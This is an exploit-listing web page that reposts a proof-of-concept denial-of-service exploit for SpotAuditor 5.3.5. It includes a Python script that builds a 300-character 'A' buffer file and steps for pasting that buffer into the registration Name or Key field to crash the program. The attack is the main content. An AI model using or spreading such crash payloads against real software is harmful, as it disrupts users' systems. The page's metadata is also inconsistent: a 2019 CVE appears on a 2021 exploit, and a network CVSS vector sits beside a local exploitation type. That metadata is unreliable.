Advertisement






SpotAuditor 5.3.5 Denial Of Service

CVE Category Price Severity
CVE-2019-16021 CWE-399 $500 High
Author Risk Exploitation Type Date
John Doe High Local 2021-02-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020147

Below is a copy:

SpotAuditor 5.3.5 Denial Of Service
# Exploit Title: SpotAuditor 5.3.5  - 'multiple' Denial Of Service (PoC)
# Exploit Author : Sinem ahin
# Exploit Date: 2021-02-10
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 x64
# Version: 5.3.5


# Steps: 
 1- Run the python script. (exploit.py)
 2- Open payload.txt and copy content to clipboard.
 3- Run 'SpotAuditor 5.3.5'.
 4- Register -> Enter Registration Code
 5- Paste clipboard into the "Name" or "Key".
 6- Click on OK.
 7- Crashed.

---> exploit.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print"File okey!!"
except:
    print "File is not created."
            

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum